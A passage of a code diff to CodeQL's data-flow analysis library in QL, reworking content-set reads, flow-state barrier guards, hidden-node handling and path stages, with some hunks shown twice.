ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -2693,9 +2855,8 @@ private module Stage4 {
if reducedViableImplInReturn(c, call) then result = TReturn(c, call) else result = ccNone()
}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) {
localFlowEntry(node, _, config) and
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) {
result =
getLocalCallContext(pragma[only_bind_into](pragma[only_bind_out](cc)),
node.getEnclosingCallable())
@@ -2791,7 +2952,7 @@ private module Stage4 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -3159,7 +3320,7 @@ private module Stage4 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -3197,10 +3358,24 @@ private module Stage4 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -3269,17 +3444,28 @@ private Configuration unbindConf(Configuration conf) {
exists(Configuration c | result = pragma[only_bind_into](c) and conf = pragma[only_bind_into](c))
}
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
pragma[nomagic]
private predicate nodeMayUseSummary0(
NodeEx n, DataFlowCallable c, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c, AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, apa, _) and
exists(AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, _, _) and
Stage4::revFlow(n, state, true, _, apa0, config) and
Stage4::fwdFlow(n, state, any(CallContextCall ccc), TAccessPathApproxSome(apa), apa0, config) and
n.getEnclosingCallable() = c
)
}
pragma[nomagic]
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c |
Stage4::parameterMayFlowThrough(_, c, apa, config) and
nodeMayUseSummary0(n, c, state, apa, config)
)
}
private newtype TSummaryCtx =
TSummaryCtxNone() or
TSummaryCtxSome(ParamNodeEx p, FlowState state, AccessPath ap) {
@@ -3475,7 +3661,7 @@ private newtype TPathNode =
* of dereference operations needed to get from the value in the node to the
* tracked object. The final type indicates the type of the tracked object.
*/
abstract private class AccessPath extends TAccessPath {
private class AccessPath extends TAccessPath {
/** Gets the head of this access path, if any. */
abstract TypedContent getHead();
@@ -3690,11 +3876,14 @@ abstract private class PathNodeImpl extends PathNode {
abstract NodeEx getNodeEx();
predicate isHidden() {
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
not this.getConfiguration().includeHiddenNodes() and
(
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
)
}
private string ppAp() {
@@ -4171,10 +4360,16 @@ private module Subpaths {
exists(NodeEx n1, NodeEx n2 | n1 = n.getNodeEx() and n2 = result.getNodeEx() |
localFlowBigStep(n1, _, n2, _, _, _, _, _) or
store(n1, _, n2, _, _) or
read(n1, _, n2, _)
readSet(n1, _, n2, _)
)
}
pragma[nomagic]
private predicate hasSuccessor(PathNode pred, PathNodeMid succ, NodeEx succNode) {
succ = pred.getASuccessor() and
succNode = succ.getNodeEx()
}
/**
* Holds if `(arg, par, ret, out)` forms a subpath-tuple, that is, flow through
* a subpath between `par` and `ret` with the connecting edges `arg -> par` and
@@ -4182,15 +4377,13 @@ private module Subpaths {
*/
predicate subpaths(PathNode arg, PathNodeImpl par, PathNodeImpl ret, PathNode out) {
exists(ParamNodeEx p, NodeEx o, FlowState sout, AccessPath apout, PathNodeMid out0 |
pragma[only_bind_into](arg).getASuccessor() = par and
pragma[only_bind_into](arg).getASuccessor() = out0 and
subpaths03(arg, p, localStepToHidden*(ret), o, sout, apout) and
pragma[only_bind_into](arg).getASuccessor() = pragma[only_bind_into](out0) and
subpaths03(pragma[only_bind_into](arg), p, localStepToHidden*(ret), o, sout, apout) and
hasSuccessor(pragma[only_bind_into](arg), par, p) and
not ret.isHidden() and
par.getNodeEx() = p and
out0.getNodeEx() = o and
out0.getState() = sout and
out0.getAp() = apout and
(out = out0 or out = out0.projectToSink())
pathNode(out0, o, sout, _, _, apout, _, _)
|
out = out0 or out = out0.projectToSink()
)
}
@@ -4526,7 +4719,11 @@ private module FlowExploration {
or
exists(PartialPathNodeRev mid |
revPartialPathStep(mid, node, state, sc1, sc2, sc3, ap, config) and
not clearsContentCached(node.asNode(), ap.getHead()) and
not clearsContentEx(node, ap.getHead()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead())
) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
distSink(node.getEnclosingCallable(), config) <= config.explorationLimit()
@@ -4542,7 +4739,11 @@ private module FlowExploration {
partialPathStep(mid, node, state, cc, sc1, sc2, sc3, ap, config) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
not clearsContentCached(node.asNode(), ap.getHead().getContent()) and
not clearsContentEx(node, ap.getHead().getContent()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead().getContent())
) and
if node.asNode() instanceof CastingNode
then compatibleTypes(node.getDataFlowType(), ap.getType())
else any()
@@ -4976,6 +5177,7 @@ private module FlowExploration {
)
}
pragma[nomagic]
private predicate revPartialPathStep(
PartialPathNodeRev mid, NodeEx node, FlowState state, TRevSummaryCtx1 sc1, TRevSummaryCtx2 sc2,
TRevSummaryCtx3 sc3, RevPartialAccessPath ap, Configuration config

View File

@@ -94,15 +94,19 @@ abstract class Configuration extends string {
predicate isBarrierGuard(BarrierGuard guard) { none() }
/**
* Holds if the additional flow step from `node1` to `node2` must be taken
* into account in the analysis.
* Holds if data flow through nodes guarded by `guard` is prohibited when
* the flow state is `state`
*/
predicate isBarrierGuard(BarrierGuard guard, FlowState state) { none() }
/**
* Holds if data may flow from `node1` to `node2` in addition to the normal data-flow steps.
*/
predicate isAdditionalFlowStep(Node node1, Node node2) { none() }
/**
* Holds if the additional flow step from `node1` to `node2` must be taken
* into account in the analysis. This step is only applicable in `state1` and
* updates the flow state to `state2`.
* Holds if data may flow from `node1` to `node2` in addition to the normal data-flow steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalFlowStep(Node node1, FlowState state1, Node node2, FlowState state2) {
none()
@@ -112,7 +116,7 @@ abstract class Configuration extends string {
* Holds if an arbitrary number of implicit read steps of content `c` may be
* taken at `node`.
*/
predicate allowImplicitRead(Node node, Content c) { none() }
predicate allowImplicitRead(Node node, ContentSet c) { none() }
/**
* Gets the virtual dispatch branching limit when calculating field flow.
@@ -166,6 +170,14 @@ abstract class Configuration extends string {
*/
int explorationLimit() { none() }
/**
* Holds if hidden nodes should be included in the data flow graph.
*
* This feature should only be used for debugging or when the data flow graph
* is not visualized (for example in a `path-problem` query).
*/
predicate includeHiddenNodes() { none() }
/**
* Holds if there is a partial data flow path from `source` to `node`. The
* approximate distance between `node` and the closest source is `dist` and
@@ -345,9 +357,13 @@ private predicate fullBarrier(NodeEx node, Configuration config) {
pragma[nomagic]
private predicate stateBarrier(NodeEx node, FlowState state, Configuration config) {
exists(Node n |
node.asNode() = n and
exists(Node n | node.asNode() = n |
config.isBarrier(n, state)
or
exists(BarrierGuard g |
config.isBarrierGuard(g, state) and
n = g.getAGuardedNode()
)
)
}
@@ -477,8 +493,9 @@ private predicate additionalJumpStateStep(
)
}
private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration config) {
read(node1.asNode(), c, node2.asNode()) and
pragma[nomagic]
private predicate readSet(NodeEx node1, ContentSet c, NodeEx node2, Configuration config) {
readSet(node1.asNode(), c, node2.asNode()) and
stepFilter(node1, node2, config)
or
exists(Node n |
@@ -488,6 +505,37 @@ private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration conf
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration config) {
exists(ContentSet cs |
readSet(node1, cs, node2, config) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate clearsContentEx(NodeEx n, Content c) {
exists(ContentSet cs |
clearsContentCached(n.asNode(), cs) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate expectsContentEx(NodeEx n, Content c) {
exists(ContentSet cs |
expectsContentCached(n.asNode(), cs) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
pragma[nomagic]
private predicate notExpectsContent(NodeEx n) { not expectsContentCached(n.asNode(), _) }
pragma[nomagic]
private predicate store(
NodeEx node1, TypedContent tc, NodeEx node2, DataFlowType contentType, Configuration config
) {
@@ -565,9 +613,9 @@ private module Stage1 {
)
or
// read
exists(Content c |
fwdFlowRead(c, node, cc, config) and
fwdFlowConsCand(c, config)
exists(ContentSet c |
fwdFlowReadSet(c, node, cc, config) and
fwdFlowConsCandSet(c, _, config)
)
or
// flow into a callable
@@ -591,10 +639,10 @@ private module Stage1 {
private predicate fwdFlow(NodeEx node, Configuration config) { fwdFlow(node, _, config) }
pragma[nomagic]
private predicate fwdFlowRead(Content c, NodeEx node, Cc cc, Configuration config) {
private predicate fwdFlowReadSet(ContentSet c, NodeEx node, Cc cc, Configuration config) {
exists(NodeEx mid |
fwdFlow(mid, cc, config) and
read(mid, c, node, config)
readSet(mid, c, node, config)
)
}
@@ -612,6 +660,16 @@ private module Stage1 {
)
}
/**
* Holds if `cs` may be interpreted in a read as the target of some store
* into `c`, in the flow covered by `fwdFlow`.
*/
pragma[nomagic]
private predicate fwdFlowConsCandSet(ContentSet cs, Content c, Configuration config) {
fwdFlowConsCand(c, config) and
c = cs.getAReadContent()
}
pragma[nomagic]
private predicate fwdFlowReturnPosition(ReturnPosition pos, Cc cc, Configuration config) {
exists(RetNodeEx ret |
@@ -704,9 +762,9 @@ private module Stage1 {
)
or
// read
exists(NodeEx mid, Content c |
read(node, c, mid, config) and
fwdFlowConsCand(c, pragma[only_bind_into](config)) and
exists(NodeEx mid, ContentSet c |
readSet(node, c, mid, config) and
fwdFlowConsCandSet(c, _, pragma[only_bind_into](config)) and
revFlow(mid, toReturn, pragma[only_bind_into](config))
)
or
@@ -732,10 +790,10 @@ private module Stage1 {
*/
pragma[nomagic]
private predicate revFlowConsCand(Content c, Configuration config) {
exists(NodeEx mid, NodeEx node |
exists(NodeEx mid, NodeEx node, ContentSet cs |
fwdFlow(node, pragma[only_bind_into](config)) and
read(node, c, mid, config) and
fwdFlowConsCand(c, pragma[only_bind_into](config)) and
readSet(node, cs, mid, config) and
fwdFlowConsCandSet(cs, c, pragma[only_bind_into](config)) and
revFlow(pragma[only_bind_into](mid), _, pragma[only_bind_into](config))
)
}
@@ -754,7 +812,8 @@ private module Stage1 {
* Holds if `c` is the target of both a read and a store in the flow covered
* by `revFlow`.
*/
private predicate revFlowIsReadAndStored(Content c, Configuration conf) {
pragma[nomagic]
predicate revFlowIsReadAndStored(Content c, Configuration conf) {
revFlowConsCand(c, conf) and
revFlowStore(c, _, _, conf)
}
@@ -853,8 +912,8 @@ private module Stage1 {
pragma[nomagic]
predicate readStepCand(NodeEx n1, Content c, NodeEx n2, Configuration config) {
revFlowIsReadAndStored(c, pragma[only_bind_into](config)) and
revFlow(n2, pragma[only_bind_into](config)) and
read(n1, c, n2, pragma[only_bind_into](config))
read(n1, c, n2, pragma[only_bind_into](config)) and
revFlow(n2, pragma[only_bind_into](config))
}
pragma[nomagic]
@@ -864,7 +923,10 @@ private module Stage1 {
predicate revFlow(
NodeEx node, FlowState state, boolean toReturn, ApOption returnAp, Ap ap, Configuration config
) {
revFlow(node, toReturn, config) and exists(state) and exists(returnAp) and exists(ap)
revFlow(node, toReturn, pragma[only_bind_into](config)) and
exists(state) and
exists(returnAp) and
exists(ap)
}
private predicate throughFlowNodeCand(NodeEx node, Configuration config) {
@@ -1110,8 +1172,8 @@ private module Stage2 {
if reducedViableImplInReturn(c, call) then result = TReturn(c, call) else result = ccNone()
}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) { any() }
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) { any() }
bindingset[node1, state1, config]
bindingset[node2, state2, config]
@@ -1139,11 +1201,26 @@ private module Stage2 {
private predicate flowIntoCall = flowIntoCallNodeCand1/5;
pragma[nomagic]
private predicate expectsContentCand(NodeEx node, Configuration config) {
exists(Content c |
PrevStage::revFlow(node, pragma[only_bind_into](config)) and
PrevStage::revFlowIsReadAndStored(c, pragma[only_bind_into](config)) and
expectsContentEx(node, c)
)
}
bindingset[node, state, ap, config]
private predicate filter(NodeEx node, FlowState state, Ap ap, Configuration config) {
PrevStage::revFlowState(state, config) and
PrevStage::revFlowState(state, pragma[only_bind_into](config)) and
exists(ap) and
not stateBarrier(node, state, config)
not stateBarrier(node, state, config) and
(
notExpectsContent(node)
or
ap = true and
expectsContentCand(node, config)
)
}
bindingset[ap, contentType]
@@ -1198,7 +1275,7 @@ private module Stage2 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -1566,7 +1643,7 @@ private module Stage2 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -1604,10 +1681,24 @@ private module Stage2 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -1698,7 +1789,8 @@ private module LocalFlowBigStep {
private class FlowCheckNode extends NodeEx {
FlowCheckNode() {
castNode(this.asNode()) or
clearsContentCached(this.asNode(), _)
clearsContentCached(this.asNode(), _) or
expectsContentCached(this.asNode(), _)
}
}
@@ -1706,18 +1798,31 @@ private module LocalFlowBigStep {
* Holds if `node` can be the first node in a maximal subsequence of local
* flow steps in a dataflow path.
*/
predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
private predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
Stage2::revFlow(node, state, config) and
(
sourceNode(node, state, config) or
jumpStep(_, node, config) or
additionalJumpStep(_, node, config) or
additionalJumpStateStep(_, _, node, state, config) or
node instanceof ParamNodeEx or
node.asNode() instanceof OutNodeExt or
store(_, _, node, _, config) or
read(_, _, node, config) or
sourceNode(node, state, config)
or
jumpStep(_, node, config)
or
additionalJumpStep(_, node, config)
or
additionalJumpStateStep(_, _, node, state, config)
or
node instanceof ParamNodeEx
or
node.asNode() instanceof OutNodeExt
or
Stage2::storeStepCand(_, _, _, node, _, config)
or
Stage2::readStepCand(_, _, node, config)
or
node instanceof FlowCheckNode
or
exists(FlowState s |
additionalLocalStateStep(_, s, node, state, config) and
s != state
)
)
}
@@ -1731,12 +1836,15 @@ private module LocalFlowBigStep {
additionalJumpStep(node, next, config) or
flowIntoCallNodeCand1(_, node, next, config) or
flowOutOfCallNodeCand1(_, node, next, config) or
store(node, _, next, _, config) or
read(node, _, next, config)
Stage2::storeStepCand(node, _, _, next, _, config) or
Stage2::readStepCand(node, _, next, config)
)
or
exists(NodeEx next, FlowState s | Stage2::revFlow(next, s, config) |
additionalJumpStateStep(node, state, next, s, config)
or
additionalLocalStateStep(node, state, next, s, config) and
s != state
)
or
Stage2::revFlow(node, state, config) and
@@ -1770,42 +1878,40 @@ private module LocalFlowBigStep {
*/
pragma[nomagic]
private predicate localFlowStepPlus(
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
DataFlowType t, Configuration config, LocalCallContext cc
NodeEx node1, FlowState state, NodeEx node2, boolean preservesValue, DataFlowType t,
Configuration config, LocalCallContext cc
) {
not isUnreachableInCallCached(node2.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
(
localFlowEntry(node1, pragma[only_bind_into](state1), pragma[only_bind_into](config)) and
localFlowEntry(node1, pragma[only_bind_into](state), pragma[only_bind_into](config)) and
(
localFlowStepNodeCand1(node1, node2, config) and
state1 = state2 and
preservesValue = true and
t = node1.getDataFlowType() // irrelevant dummy value
t = node1.getDataFlowType() and // irrelevant dummy value
Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
or
additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
additionalLocalFlowStepNodeCand2(node1, state, node2, state, config) and
preservesValue = false and
t = node2.getDataFlowType()
) and
node1 != node2 and
cc.relevantFor(node1.getEnclosingCallable()) and
not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall())
or
exists(NodeEx mid |
localFlowStepPlus(node1, state1, mid, pragma[only_bind_into](state2), preservesValue, t,
localFlowStepPlus(node1, pragma[only_bind_into](state), mid, preservesValue, t,
pragma[only_bind_into](config), cc) and
localFlowStepNodeCand1(mid, node2, config) and
not mid instanceof FlowCheckNode and
Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
)
or
exists(NodeEx mid, FlowState st |
localFlowStepPlus(node1, state1, mid, st, _, _, pragma[only_bind_into](config), cc) and
additionalLocalFlowStepNodeCand2(mid, st, node2, state2, config) and
exists(NodeEx mid |
localFlowStepPlus(node1, state, mid, _, _, pragma[only_bind_into](config), cc) and
additionalLocalFlowStepNodeCand2(mid, state, node2, state, config) and
not mid instanceof FlowCheckNode and
preservesValue = false and
t = node2.getDataFlowType() and
Stage2::revFlow(node2, state2, pragma[only_bind_into](config))
t = node2.getDataFlowType()
)
)
}
@@ -1819,9 +1925,19 @@ private module LocalFlowBigStep {
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
AccessPathFrontNil apf, Configuration config, LocalCallContext callContext
) {
localFlowStepPlus(node1, state1, node2, state2, preservesValue, apf.getType(), config,
callContext) and
localFlowExit(node2, state2, config)
localFlowStepPlus(node1, state1, node2, preservesValue, apf.getType(), config, callContext) and
localFlowExit(node2, state1, config) and
state1 = state2
or
additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
state1 != state2 and
preservesValue = false and
apf = TFrontNil(node2.getDataFlowType()) and
callContext.relevantFor(node1.getEnclosingCallable()) and
not exists(DataFlowCall call | call = callContext.(LocalCallContextSpecificCall).getCall() |
isUnreachableInCallCached(node1.asNode(), call) or
isUnreachableInCallCached(node2.asNode(), call)
)
}
}
@@ -1879,8 +1995,8 @@ private module Stage3 {
bindingset[call, c, innercc]
private CcNoCall getCallContextReturn(DataFlowCallable c, DataFlowCall call, Cc innercc) { any() }
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) { any() }
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) { any() }
private predicate localStep(
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
@@ -1894,7 +2010,34 @@ private module Stage3 {
private predicate flowIntoCall = flowIntoCallNodeCand2/5;
pragma[nomagic]
private predicate clear(NodeEx node, Ap ap) { ap.isClearedAt(node.asNode()) }
private predicate clearSet(NodeEx node, ContentSet c, Configuration config) {
PrevStage::revFlow(node, config) and
clearsContentCached(node.asNode(), c)
}
pragma[nomagic]
private predicate clearContent(NodeEx node, Content c, Configuration config) {
exists(ContentSet cs |
PrevStage::readStepCand(_, pragma[only_bind_into](c), _, pragma[only_bind_into](config)) and
c = cs.getAReadContent() and
clearSet(node, cs, pragma[only_bind_into](config))
)
}
pragma[nomagic]
private predicate clear(NodeEx node, Ap ap, Configuration config) {
clearContent(node, ap.getHead().getContent(), config)
}
pragma[nomagic]
private predicate expectsContentCand(NodeEx node, Ap ap, Configuration config) {
exists(Content c |
PrevStage::revFlow(node, pragma[only_bind_into](config)) and
PrevStage::readStepCand(_, c, _, pragma[only_bind_into](config)) and
expectsContentEx(node, c) and
c = ap.getHead().getContent()
)
}
pragma[nomagic]
private predicate castingNodeEx(NodeEx node) { node.asNode() instanceof CastingNode }
@@ -1903,8 +2046,13 @@ private module Stage3 {
private predicate filter(NodeEx node, FlowState state, Ap ap, Configuration config) {
exists(state) and
exists(config) and
not clear(node, ap) and
if castingNodeEx(node) then compatibleTypes(node.getDataFlowType(), ap.getType()) else any()
not clear(node, ap, config) and
(if castingNodeEx(node) then compatibleTypes(node.getDataFlowType(), ap.getType()) else any()) and
(
notExpectsContent(node)
or
expectsContentCand(node, ap, config)
)
}
bindingset[ap, contentType]
@@ -1963,7 +2111,7 @@ private module Stage3 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -2331,7 +2479,7 @@ private module Stage3 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -2369,10 +2517,24 @@ private module Stage3 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -2693,9 +2855,8 @@ private module Stage4 {
if reducedViableImplInReturn(c, call) then result = TReturn(c, call) else result = ccNone()
}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) {
localFlowEntry(node, _, config) and
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) {
result =
getLocalCallContext(pragma[only_bind_into](pragma[only_bind_out](cc)),
node.getEnclosingCallable())
@@ -2791,7 +2952,7 @@ private module Stage4 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -3159,7 +3320,7 @@ private module Stage4 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -3197,10 +3358,24 @@ private module Stage4 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -3269,17 +3444,28 @@ private Configuration unbindConf(Configuration conf) {
exists(Configuration c | result = pragma[only_bind_into](c) and conf = pragma[only_bind_into](c))
}
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
pragma[nomagic]
private predicate nodeMayUseSummary0(
NodeEx n, DataFlowCallable c, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c, AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, apa, _) and
exists(AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, _, _) and
Stage4::revFlow(n, state, true, _, apa0, config) and
Stage4::fwdFlow(n, state, any(CallContextCall ccc), TAccessPathApproxSome(apa), apa0, config) and
n.getEnclosingCallable() = c
)
}
pragma[nomagic]
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c |
Stage4::parameterMayFlowThrough(_, c, apa, config) and
nodeMayUseSummary0(n, c, state, apa, config)
)
}
private newtype TSummaryCtx =
TSummaryCtxNone() or
TSummaryCtxSome(ParamNodeEx p, FlowState state, AccessPath ap) {
@@ -3475,7 +3661,7 @@ private newtype TPathNode =
* of dereference operations needed to get from the value in the node to the
* tracked object. The final type indicates the type of the tracked object.
*/
abstract private class AccessPath extends TAccessPath {
private class AccessPath extends TAccessPath {
/** Gets the head of this access path, if any. */
abstract TypedContent getHead();
@@ -3690,11 +3876,14 @@ abstract private class PathNodeImpl extends PathNode {
abstract NodeEx getNodeEx();
predicate isHidden() {
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
not this.getConfiguration().includeHiddenNodes() and
(
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
)
}
private string ppAp() {
@@ -4171,10 +4360,16 @@ private module Subpaths {
exists(NodeEx n1, NodeEx n2 | n1 = n.getNodeEx() and n2 = result.getNodeEx() |
localFlowBigStep(n1, _, n2, _, _, _, _, _) or
store(n1, _, n2, _, _) or
read(n1, _, n2, _)
readSet(n1, _, n2, _)
)
}
pragma[nomagic]
private predicate hasSuccessor(PathNode pred, PathNodeMid succ, NodeEx succNode) {
succ = pred.getASuccessor() and
succNode = succ.getNodeEx()
}
/**
* Holds if `(arg, par, ret, out)` forms a subpath-tuple, that is, flow through
* a subpath between `par` and `ret` with the connecting edges `arg -> par` and
@@ -4182,15 +4377,13 @@ private module Subpaths {
*/
predicate subpaths(PathNode arg, PathNodeImpl par, PathNodeImpl ret, PathNode out) {
exists(ParamNodeEx p, NodeEx o, FlowState sout, AccessPath apout, PathNodeMid out0 |
pragma[only_bind_into](arg).getASuccessor() = par and
pragma[only_bind_into](arg).getASuccessor() = out0 and
subpaths03(arg, p, localStepToHidden*(ret), o, sout, apout) and
pragma[only_bind_into](arg).getASuccessor() = pragma[only_bind_into](out0) and
subpaths03(pragma[only_bind_into](arg), p, localStepToHidden*(ret), o, sout, apout) and
hasSuccessor(pragma[only_bind_into](arg), par, p) and
not ret.isHidden() and
par.getNodeEx() = p and
out0.getNodeEx() = o and
out0.getState() = sout and
out0.getAp() = apout and
(out = out0 or out = out0.projectToSink())
pathNode(out0, o, sout, _, _, apout, _, _)
|
out = out0 or out = out0.projectToSink()
)
}
@@ -4526,7 +4719,11 @@ private module FlowExploration {
or
exists(PartialPathNodeRev mid |
revPartialPathStep(mid, node, state, sc1, sc2, sc3, ap, config) and
not clearsContentCached(node.asNode(), ap.getHead()) and
not clearsContentEx(node, ap.getHead()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead())
) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
distSink(node.getEnclosingCallable(), config) <= config.explorationLimit()
@@ -4542,7 +4739,11 @@ private module FlowExploration {
partialPathStep(mid, node, state, cc, sc1, sc2, sc3, ap, config) and
not fullBarrier(node, config) and
